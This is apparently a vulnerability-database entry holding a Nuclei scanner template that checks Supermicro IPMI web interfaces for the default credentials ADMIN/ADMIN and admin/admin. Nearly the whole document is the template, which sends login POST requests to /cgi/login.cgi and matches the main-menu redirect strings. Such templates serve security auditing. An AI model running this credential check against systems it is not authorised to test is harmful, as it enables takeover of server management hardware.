supermicro-default-login: Supermicro Ipmi - Default Admin Login

日期: 2025-08-01 | 影响软件: Supermicro Ipmi | POC: 已公开

漏洞描述

Supermicro Ipmi default admin login credentials were successful.

PoC代码[已公开]

id: supermicro-default-login

info:
  name: Supermicro Ipmi - Default Admin Login
  author: For3stCo1d
  severity: high
  description: Supermicro Ipmi default admin login credentials were successful.
  reference:
    - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/
  metadata:
    max-request: 2
  tags: supermicro,default-login,vuln

http:
  - raw:
      - |
        POST /cgi/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{user}}&pwd={{pass}}

    attack: pitchfork
    payloads:
      user:
        - ADMIN
        - admin
      pass:
        - ADMIN
        - admin
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'self.location='
          - '/cgi/url_redirect.cgi?url_name=mainmenu'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206176ee8953ff776cebf5e9b6ab879508947d2011bdb43a66189d0813bc096518022100b220c6f72b6bb6274b9d081863d0e21465384568d20c34c2aa78b04b0f35c612:922c64590222798bb761d5b6d8e72950